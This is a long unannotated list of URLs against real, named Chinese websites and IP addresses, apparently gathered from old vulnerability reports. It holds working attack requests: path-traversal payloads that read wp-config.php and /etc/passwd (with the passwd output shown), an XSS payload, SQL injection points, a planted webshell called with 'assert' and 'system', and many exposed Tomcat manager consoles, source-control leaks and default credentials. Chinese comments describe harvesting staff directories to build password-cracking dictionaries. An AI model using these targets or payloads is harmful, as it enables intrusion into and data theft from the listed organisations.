http://120.55.125.159/ http://www.bjmakerspace.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php site:xhd.cn inurl:action?order.orderNo= http://idea.open.com.cn/search/1-1-1.aspx?PPBOX* http://www.codoon.com/backend/friendsrc http://www.xinyuejunxi.com/ https://api.leancloud.cn/1.1/users?include=pictures,avatar&where={"objectId":"5582c1b2e4b04ccce3c7b248 http://ac-mp4nefs1.clouddn.com/sq3VNKTpvAVDwAfWSAiVMRA.jpg http://ac-mp4nefs1.clouddn.com/lGEmCHAZ7xDzTJ61cemVDtC.jpg http://ac-mp4nefs1.clouddn.com/rnEPceAPapY5hS2PQSsjRrD.jpg http://ac-mp4nefs1.clouddn.com/Wr543ISR2EIdILMgTSsRHtD.jpg http://ac-mp4nefs1.clouddn.com/sq3VNKTpvAVDwAfWSAiVMRA.jpg https://email.creditease.cn/ http://**.**.**.**/bugs/wooyun-2015-0109946有感而发 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 
http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**:8030/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**/DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://**.**.**.**//DPMA/Web/Interface/Pages/Frame_TeacherCourse.aspx?i_rang=0&asid=100 http://www.scjst.gov.cn/WebPage/infofulltextsearch.html?keyword='&selectedSearchCategory=0 http://veepalms.open.com.cn/Home/Login http://baike.meadin.com/history/?hid=33582 http://**.**.**.**/index/index_partners.action http://**.**.**.**/xq5u/ http://**.**.**.**/demo http://**.**.**.**/xq5u/index/index_activation.jhtml http://**.**.**.**/xq5u/index/index_activationEn.jhtml http://www.haoshili.com.cn/brand_information.php?fid=2 http://www.haoshili.com.cn/brand_information_show.php?id=2 http://www.haoshili.com.cn/gongyi1.php?id=2 http://www.haoshili.com.cn/gongyi_show.php?id=2 http://www.haoshili.com.cn/shop/index.php?sorts=2 http://www.haoshili.com.cn/zhuanqu/article_frame.php http://www.haoshili.com.cn/zhuanqu/eye2_frame.php http://www.haoshili.com.cn/zhuanqu/eye3_frame.php http://www.haoshili.com.cn/zhuanqu/eye4_frame.php 
http://www.haoshili.com.cn/zhuanqu/eye_frame.php?id=361&page=1 http://www.haoshili.com.cn/shop/experts.php?act=list&page=\ http://www.haoshili.com.cn//shop/goods.php?id=274&page= http://www.haoshili.com.cn//shop/index.php?act=sort http://www.yicai.com/user/do.php?ac=lostpasswd®mode=mobile magic.360.cn/.git/config http://nongjibao.189.cn/login2.jsp http://www.szwen.gov.cn/culture.jsp http://www.szcf.org.cn ftp://203.91.45.52/ http://www.mangocity.com/product/10506752p2.html?type=90&c=cholidayindexcontroller&m=comindex&d=grouptravel URL:http://www.dyjywx.com/index.action URL:http://222.186.112.4/xbk/Index.aspx http://www.ihxlife.com/user/toLogin.do http://www.ettoday.net/events/fifa2014/live.php?id=62 SVN:http://castest.xbwl.cn:9090/job/PUMA2.0_REPORT/ws/.svn/entries http://castest.xbwl.cn:9090/job/PUMA2.0_REPORT/ws/ jdbc:oracle:thin:@//183.62.248.82:1521/puma jdbc:oracle:thin:@//192.168.8.220:1522/xbwl http://wsb.tcl.com/shenwebnew/manager/login.asp http://client.weimai.com/weimai/s/order/order.json?id=11111111&orderid=10110017&buytoken=undefined&token=1111111111111111111111&_=1435552306440 http://www.tp-linkshop.com.cn/ http://v.baidu.com/v?word=%3Cimg+src%3Dx+onerror%3Dalert%2821212%29%3E&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=utf-8 http://www.jlsjsaq.cn/ http://114.215.128.65:8036/Main/p1.aspx?n= http://114.215.128.65:8001/ http://114.215.128.65:8036/ http://114.215.128.65:8001/ http://114.215.128.65:8003/ http://114.215.128.65:8002/ http://pic.xnnews.com.cn/View_GroupPhoto.asp?id=3533 http://itoms.open.com.cn/Admin/login.aspx http://1dui1.huatu.com/ydyzs.php http://www.ineice.com/ http://fs.ineice.com/detect/icon/ www.ineice.com http://www.ineice.com http://hui.vcyber.com:80/comm/commlist?CommName=-1&CommTypeID=&IYN=Y&PageNum=e&sellPrice=&time=1435561541208&TJType=5&ZCount=&_=1435561576234 http://www.leyou.com.cn/mob/getAddress?token=15e2ecf73e2b4c7f242f38461012bcb3&userId=3431171&pageIndex=1&pageSize=10 http://hui.vcyber.com:80/ IP:60.28.210.223 
IP:60.28.210.239 http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**:8081/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/ks/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://config.kuwo.cn/config/ http://config.kuwo.cn/usage/ http://60.10.8.227:88 http://ydx.shnu.edu.cn/%284nm0au550olsjhvyzgmsob55%29/ggsm.aspx?fbsj=2011-03-28%2015:56:17&yxqx=2022-03-29&xh=5 https://111.205.11.29 https://111.205.11.28 http://218.7.196.61/hljcsyxzm/index.aspx http://oa.leyou.com.cn:80/ http://www.ztekj.com/ http://wooyun.org/bugs/wooyun-2010-041699 http://www.ztekj.com/deploy/management/console.war/jsp_info.jsp,可以执行命令: http://fcdr.zhcw.com/index.php/Person/index/uid/284 http://**.**.**/ http://cg.lashou.com/new_index.php?class=Stat&goods_id=10121973&fd_id=39355 http://oa.leyou.com.cn/ http://oa.leyou.com.cn:9002/jmx-console http://www.x.com.cn/ http://sh.suning.com/life/tom/payment/memtrans-payment!prePay.action?orderNo=2015062900231169 http://www.chinanetwork.com.cn/w8/w8.zip https://mail.letv.com http://shop1.x.com.cn/save_orders.php?id_code=XA150629215367 http://115.29.164.115/?code=yxkj http://115.29.164.115/v3_mms_send_pre/mmsfile/res/images/1435578187937.php http://its.zte.com.cn:80/dms/uiloader/login.aspx www.zjhz.lss.gov.cn/lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/struts-config.xml www.zjhz.lss.gov.cn/lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/struts-sysmanager.xml http://edu.baidu.com/ http://edu.baidu.com/taoli/resource/activity/activityManagge.jsp http://www.bitcomet.com/.svn/entries http://img11.homemall.com.cn/group1/M01/3A/0E/ooYBAFPh-iyAOIWHAAHWSFYRekM071_65x65.jpg http://p.hiall.com.cn/data.rar http://www.mangocity.com/product/10506752p2.html http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print 
http://oa.glsc.com.cn:10040/wps/portal,此处可用常用用户名和弱密码123456获得某个账号,再从中获取全公司通讯录(导出方法是从右上角“搜索电子通讯录”处输入通配符"%",再进行导出,包括公司所有人员联系方式,公司董事长及其他高管电话、邮箱应有尽有),将其重新做一个用户名字典,用公司论坛中通知修改的新默认密码和其它弱密码进一步获取账号若干。搜了下以前的漏洞,发现 http://s.xbiao.com/map?id=270 http://www.fcggjj.com/防城港市住房公积金 http://www.xygtzyj.gov.cn/admin/ywjggs/zl_ywjggsMore.asp http://claim.sinosafe.com.cn:15080/ http://home.xywy.com/user.php?act=addgroup http://mis.gd118114.cn/ http://fob.xywy.com http://shop.leishen.cn http://shop.leishen.cn/shell.php http://wb.99.com http://localhost:8081/index.php?s=member&c=info&a=avatar https://mail.qiyi.com http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601 http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601 http://mantis.xywy.com/login_page.php url:http://ecard.sysu.edu.cn/Account/Bind/rqTxggupLVF9bQS-r6AxDsCiSMUUC5BH4GePdkU58VA%3d http://m.xinguodu.com:89 http://www.chinabed.com:89/ http://wap.helichina.com/ http://m.ccccie.com http://hz.cofcopack.com/ http://www.jdyfy.com:89/login.do http://woa.lanju.cn http://www.dngroup.cn:89/ http://emobile.ldjt.com.cn http://mail.lanju.cn/ http://m.jiaxun.com/ http://oa.joincare.com.cn:89 http://m.zxhsd.com/ http://www.i-waiter.cn/index.jsp http://zu.wuhan.fang.com/login.aspx?furl=/rent/UserCenter/MyInputHouse.aspx?businesstype=CZ&housetype=JX这个接口看到没有验证码限制 http://221.214.92.82/ http://221.214.92.83/ http://221.214.92.79:8080/jfjz/ http://221.214.92.79:8080/ http://221.214.92.82/ http://tg.g.v1.cn/.svn/entries http://cloud.zte.com.cn/html/login.html www.22.cn www.22.cn http://today.itjuzi.com:80/ http://119.90.59.128/index.php?a=login http://119.90.59.128/index.php?a=login&c=../../../../../../../../../../etc/passwd%00.jpg http://123.139.154.143/tclc/USERLogin.action?condition=%257B%2522LOGINNAME%2522%253A%25221%2522%252C%2522PASSWORD%2522%253A%25221%2522%252C%2522ip%2522%253A%2522%2522%252C%2522refer%2522%253A%2522%2522%257D http://123.139.154.143/tclc/wooyun.txt 
http://www.art.hbnu.edu.cn/userfiles/file/front_read.action http://samsungbbs.cnmo.com http://www.hljgljl.gov.cn:80/module/jslib/jquery/jpage/dataproxy.jsp?unitid=1 http://dzqd-oa.10010.com/,中国联通电子商务部管理平台,此处验证码可重用,用猪猪侠的常用用户名可获取几个账号,登陆后在全国通讯录可查看联通电子商务全国员工联系方式,将收集的邮箱做成字典,可对邮箱进一步进行破解。 http://202.111.44.69/zcgx/login.jsp永城财险整车数据自动更新系统 http://www.coastalbank.cn/ http://www.coastalbank.cn/yh_yh_admin_yk/lyan1/veiw.php?id=22 http://**.**.**.**:10000/ http://**.**.**.**/ http://**.**.**.**:81/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/epaper/test/login.jsp http://**.**.**.**:8080 country:China http://122.224.89.219/mms/musicManager.jsp http://61.233.42.78/mms/musicManager.jsp http://61.153.181.190:81/mms/musicManager.jsp http://61.236.195.164/mms/musicManager.jsp http://61.233.42.73/mms/musicManager.jsp POST:musicType=0&musicByname=0 POST:musicTypeadmin=0 POST:picTypeadmin=0 POST:picType=0 http://kaoshi.centfor.com/ http://kaoshi.centfor.com http://www.gydyej.gov.cn:8081/Search.aspx?key=1&orgid=28798 http://wooyun.org/bugs/wooyun-2010-092390 http://v.m.joy.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/resin-web.xml http://sse.eln.com.cn:80/reg/checkname.php?gsid=&value=1 http://ting.weibo.com/music/show/showlist?location=35 http://ting.weibo.com/music/show/showlist?location=35 http://115.28.47.160:90/.svn/entries http://115.28.47.160:6001/.svn/entries http://115.28.47.160:3000/.svn/entries http://115.28.47.160:7777/.svn/entries http://www.imooc.com/myclub/opus http://itoms.open.com.cn/Admin/login.aspx http://yytxl.cn/wap/wap_login.aspx?submit=true http://yytxl.cn/wap/ http://221.1.83.202:81/ admin:123456 android:name="com.igexin.download.DownloadReceiver android:name="android.net.conn.CONNECTIVITY_CHANGE"/ http://etcom.cn/customerService/loginAction.action http://112.53.79.139:9085/Ztesweb/,被提交过一个后台万能密码,已经修复了,略失望,但是发现了一个上传点,http://112.53.79.139:9085/Ztesweb/admin/upload.jsp: 
http://112.53.79.139:9085/Ztesweb/upload/config.jsp,已经不是处女地了,14年就被拿下了,伤心: http://58.213.19.30/forum.php http://drops.wooyun.org/papers/2893 http://today.itjuzi.com:80/ http://www.xiangshe.com/my/Ordercancel.do?orderid=201506301522501387 http://www.picooc.com/.svn/entries http://bbs.picooc.com/.svn/entries https://pcs.baidu.com/rest/2.0/structure/table http://sdk2.sudas.cn:8060/z_mdsmssend.aspx http://sdk2.sudas.cn:8060/z_balance.aspx http://api.map.baidu.com/location/ip www.picooc.com";//网站url http://111.160.204.56/manager/html http://oa.scxxt.com.cn/manager/html http://www.yancaosuo.com/manager/html http://www.gxntjz.cn:8088/manager/html http://58.57.168.171:8088/manager/html http://116.1.207.15:8003/manager/html http://218.201.63.166:8888/manager/html http://222.223.124.48:8001/manager/html http://61.163.103.86:8000/manager/html http://112.25.215.179:88/manager/html http://61.191.24.171:8888/manager/html http://118.122.122.252:8080/manager/html http://58.211.254.123:8080/manager/html http://218.65.236.71:88/manager/html http://60.209.29.213/manager/html http://59.46.163.20:8081/manager/html http://oa.hangyjx.com/manager/html http://218.93.178.211:1010/manager/html http://211.161.4.214/manager/html http://powerstarups.uicp.cn/manager/html http://powerstarups.uicp.net/manager/html http://60.22.154.66:8080/manager/html http://183.203.150.20:8000/manager/html http://59.46.163.20:8081/manager/html http://59.46.161.202:8080/manager/html http://222.168.33.62:81/manager/html http://58.30.78.228/manager/html http://111.206.198.201/manager/html http://211.99.249.66:8080/manager/html http://60.10.197.25:8080/manager/html http://218.25.158.24:8090/manager/html http://59.175.193.250:8080/manager/html http://59.46.124.99:8080/manager/html http://218.106.246.132:8080/manager/html http://60.10.64.205:8080/manager/html http://183.166.57.31:8090/manager/html http://60.191.122.186:8888/manager/html http://221.192.206.27:8090/manager/html http://124.163.218.92:81/manager/html 
http://122.156.165.134:8080/manager/html http://61.163.55.47:8888/manager/html http://218.24.144.80:8888/manager/html http://218.24.172.158:8080/manager/html http://58.241.129.182:8080/manager/html http://101.68.68.194:8080/manager/html http://222.219.118.120:8080/manager/html http://222.128.25.190:8080/manager/html http://222.128.25.190:8080/manager/html http://www.mccyck.cn:8080/manager/html http://fortunesroll.com/manager/html http://59.173.241.30:8080/manager/html http://222.173.43.19:8081/manager/html http://oa.jtv.com.cn/manager/html http://oa.bjkgtz.net:8080/manager/html http://oa.bjkgtz.net:8080/manager/html http://www.fortunesroll.com/manager/html http://60.190.134.254:8080/manager/html http://oa.essca.com/manager/html http://124.205.40.202:88/manager/html http://218.94.43.114:8888/manager/html http://113.16.175.170:8008/manager/html http://shanxi.sinosteel.com:8888/manager/html http://111.160.204.56:80/manager/html http://219.148.83.173:80/manager/html http://s-60560.gotocdn.com:8888/manager/html http://oa.scxxt.com.cn/manager/html http://**.**.**.**/cn/index.php?pid=1 http://yjy.zdjyw.net.cn/system/systemnotice/notice.action?id=6539存在命令执行漏洞 ftp://111.11.28.49/考试系统部署文档.docx http://picooc.com/.svn/entries http://bbs.picooc.com/.svn/entries http://vwww.picooc.com/.svn/entries http://ww2.picooc.com/.svn/entries http://vww.picooc.com/.svn/entries http://www.bbs.picooc.com/.svn/entries http://sss.picooc.com/.svn/entries http://picooc-latin_www.picooc.com/.svn/entries http://ftp.picooc.com/.svn/entries http://wwaw.picooc.com/.svn/entries http://www.picooc.com_www.picooc.com/.svn/entries http://www.statistics.picooc.com/.svn/entries http://mial.picooc.com/.svn/entries http://email.picooc.com/.svn/entries http://weww.picooc.com/.svn/entries http://weixin.cnooc.com.cn/ http://www.picooc.com:80/ www.picooc.com http://110.249.219.99:7700/RS22/userLogin!toLogin.action?subSysId=7&loginTitle=%E5%B8%82%E5%B1%80%E8%A1%A5%E8%80%83存在命令执行漏洞 
http://www.hneao.cn/yx/ysks/yx_kdyxfack.aspx?kddm=203&zylbdm=01存在注入 http://211.94.145.63:7001/menu/index.jsp http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//**.**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/job//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ ftp://218.58.70.160 www.hegouvip.com http://my.ikang.com/packageDetail?packageid=425919&cardnumber=0010900090130722 http://my.ikang.com/packageDetail?packageid=425919&cardnumber=0010900090930722 http://my.ikang.com/packageDetail?packageid=425919&cardnumber=0010900090730722 http://wooyun.org/bugs/wooyun-2015-0111690 http://**.**.**.**/tzptweb/webpages/article_list_page.aspx http://**.**.**.**/webpages/article_list_page.aspx http://gonghui.shmetro.com:8080/shentong-union/login http://club.xywy.com/ask_success.php?type=bindphone 
http://www.gesafe.com/xintuo/xt_GongSi.aspx?id=31 http://**.**.**.**/bugs/wooyun-2010-078095 http://**.**.**.**:8002/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://www.danmu.com/api/play http://www.scal.com.cn/invite2011/admin/Admin_Invite.aspx http://m.haolyy.com/web/showmember/appcatview?categoryId1=10 www.fesco.com.cn www.fesco.com.cn http://group.swoole.com/search/ajax/search_result/search_type-all__q-Module%20'pcntl'%20already%20loaded__template-__page-2 http://220.250.65.185/Index.aspx http://travel.xiamenair.com/Travel/Domestic.html?start=%7Cundefined&end=%25u53A6%25u95E8%7CXMN http://**.**.**/iSite/login.jsp http://222.83.251.40/logonAction.do http://222.83.251.40/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://222.83.251.40/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../WEB-INF/ index.php/System/Model/getData http://www.chaojibiaoge.com:80/ www.chaojibiaoge.com http://61.182.242.18:8080/ http://61.183.151.86:81/ http://61.164.84.70:8080/ http://58.64.211.92:8080/ http://58.211.149.138:81/ http://58.240.92.219/ http://59.33.36.234:8080/ http://60.12.220.103:8000/ http://wuliu.swust.edu.cn http://kmras.pinlivefoods.com:8130 http://whlc.kmras.com:9000/ http://www.superfly.cn:8088/ http://tianyicnc.meibu.com:800/ http://cqdh.kmras.com/ http://www.ydqx.cn/ http://ras.shekou.cmhk.com/ http://cmpd.shekou.cmhk.com/ http://www.xbzx.ynu.edu.cn/DownLoad/Show.aspx?id=64 http://xcd.xeeyu.net/UserLogin.aspx 
https://github.com/xiongmeng/libs/blob/df4dfc4373f5b96470827ab118a9ed77a3ebc46a/Sports/Log/LogWBY/Log4php/Appender/LogMail.php ftp://125.76.237.71/ ftp://125.76.237.71/c_member.txt http://wsdj.saic.gov.cn/saicetpsweb/webLogin.do?method=checkWebApplyProposer http://61.134.118.34/logonAction.do http://61.134.118.34/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ hammerhead:/data/data/com.baidu.input/files/land http://ms.csdn.net/proxy/search_tags?SessionID=SESSIONID-ST-85274-Rjh15DiTsacQp9ybRuef-passport.csdn.net&word=a&size=50 http://api.passport.xywy.com/n_userHeaderGet.php?callback=1&a=u&uid=60356754 http://v.huatu.com/newhome/datum.php?action=lecture&type=v http://www.saic.gov.cn/ywbl/zxcx/djqyxxcx/index.html http://gzhd.saic.gov.cn:8281/other/chaxun/listQyName.jsp http://www.g-emall.com/ http://search.nm.zsks.cn/也不知道有啥,懒得继续跑了,毕竟招生信息。。。。高考的孩子不容易 URL:http://fast.ele.me:89/login.do com:211.94.145.96 http://211.94.145.96:10000/manager/html http://wooyun.org/bugs/wooyun-2010-0117338 http://202.207.247.44/urp.zip http://www.ruijie.com.cn/ http://223.220.248.3/index.htm http://221.213.54.66/index.htm http://219.139.148.126/index.htm http://60.19.64.146/index.htm http://125.67.7.2/index.htm http://202.103.10.214/index.htm http://58.18.131.200/index.htm http://175.174.62.25/index.htm http://58.254.92.130/index.htm http://58.18.163.190/index.htm http://117.132.9.226/index.htm http://119.255.22.13/index.htm http://211.154.11.246/index.htm http://221.203.77.234/index.htm http://120.209.15.197:8888/index.htm http://61.131.82.228:8080/index.htm http://221.202.167.17:8080/index.htm http://202.115.254.26/index.htm http://1.30.21.42/index.htm http://218.65.220.99:9090/index.htm http://221.213.54.66/index.htm为例: http://221.213.54.66/cache.htm http://ued.suning.com/survey/express/d1lvZ1lT http://popo.wan.ijinshan.com/.git/config http://popo.wan.ijinshan.com/.git/ 
http://m.qucai.com/information/news_view.aspx?ID=24 http://u.muzhiwan.com/1 http://www.88box.com:80/ www.88box.com http://218.107.60.60/ http://u.muzhiwan.com/ http://tc.homelink.com.cn/,超级经纪人大赛 http://zoo.e-tobe.com/news.php?id=1 http://122.13.76.111:8888/woo-mina/login.jsp http://122.13.76.111:8888 http://114.251.3.99/hxjy/initPage.action http://www.zili.cn/ http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0903530080720150000055 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000028 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0643233080720150000976 http://www.cnbeta.com/articles/286217.htm http://www.eshimin.com/pages/account/resetpsd/resetPsdIndex.jsp http://www.xiaolajiao.com/robots.txt http://faq.xiaolajiao.com/从这说起 http://faq.xiaolajiao.com/?question/ajaxsearch/sst https://github.com/chenhongbao/adminsys/blob/b081e6182f1a8226476a8ac8f7a03d023c55e9b1/web/xml/email.config.xml site:51yund.com,看看有没有新站点可以入手,发现一个新站点 http://test-jiaolian1.51yund.com/me/index http://jiaolian.51yund.com/me/index http://jiaolian.51yund.com/ask/askDetail/id/2304 http://jiaolian.51yund.com/member/instructor/id/12476760 http://jiaolian.51yund.com/ask/answerDetail/id/8 https://github.com/laolang81/food/blob/2312771af5555d6b9c81c17fb1564be024adbe76/config/properties/mail.properties https://github.com/sonyfe25cp/dlde-parent/blob/325325799276e2385d4fb2ff8d23de2d3916c1d2/dlde-commons/src/test/java/utils/EmailSender.java http://www.chaojibiaoge.com/index.php/Oa/Project/viewContent/id/3221/sharekey/f2k860y4 http://jiaolian.51yund.com/me/coachAttest http://jiaolian.51yund.com/me/uploadVideo http://jiaolian.51yund.com/member/instructor/id/2903 http://jiaolian.51yund.com/video/detail/id/2988 http://jiaolian.51yund.com/ask/create https://github.com/jasonlvhit/fuck-B2C/blob/aea5bd6a15d2d63025806b40289bc04f94420f2e/B2C/views.py www.yihu.com www.citytalk.tw/bbs/uc_server/avatar.php?size=small&uid= home.fang.com/user/login.aspx这个是搜房网旗下的一个登陆系统,登陆的地方没有验证码限制 
http://wap.cnmo.com/doc_tail.php?docid=257997 http://wap.cnmo.com/doc_tail.php?docid=257997 http://222.74.1.146:8080/nmcindex/ http://3gfs.net/order.php?id=192&type=zdq&num=1&tc=48&mstr=detail&mark=&shid= http://3gfs.net/img/id_pic/20150630164320.php?a=assert&b=phpinfo%28%29 http://3gfs.net/img/id_pic/20150630164320.php?a=system&b=dir http://**.**.**.**/bugs/wooyun-2010-0104541 http://**.**.**.**/Chinese/Bs_DownloadShow.asp?Bs_DownID=46 http://**.**.**.**/Chinese/Bs_DownloadShow.asp?Bs_DownID=120 http://**.**.**.**/Chinese/Bs_DownloadShow.asp?Bs_DownID=42 http://**.**.**.**/Chinese/bs_DownloadShow.asp?Bs_DownID=28 http://**.**.**.**/Chinese/bs_DownloadShow.asp?Bs_DownID=43 http://**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%CD%BC%D0%CE%CD%BC%CF%F1 http://www.**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%B9%AB%CB%BELOGO http://**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%D3%A6%D3%C3%C8%ED%BC%FE http://**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%CD%F8%C2%E7%B0%B2%C8%AB http://**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%D0%D0%D2%B5%C8%ED%BC%FE http://**.**.**.**/Chinese/Bs_jishuProductShow.asp?ArticleID=299 http://**.**.**.**/Chinese/Bs_jishuProductShow.asp?ArticleID=50 http://**.**.**.**/Chinese/Bs_jishuProductShow.asp?ArticleID=48 http://**.**.**.**/chinese/Bs_jishuProductShow.asp?ArticleID=69 http://218.26.102.61/ http://www.chaojibiaoge.com/index.php/Index/index http://www.chaojibiaoge.com/index.php/Home/Index/forgetPassword http://www.f-young.cn/ http://web3.17500.cn/800/nr.php?id=27 http://web2.17500.cn/800/nr.php?id=27 http://web1.17500.cn/800/nr.php?id=27 http://17500.cn/800/nr.php?id=27 https://61.235.38.122/09/index.php https://61 http://59.32.204.234:8084/sgjgyjfb/scindex.action?scName=存在命令执行漏洞 www.dpex.com.tw www.muzhiwan.com/index.php?action=album&aid=我是注入点&opt=getuserupdate www.muzhiwan.com www.muzhiwan.com http://www.next-energy.com.cn/ http://www.xtrs.gov.cn/xtzj/new/unitPicUpload 
http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=13532928829532 http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin 
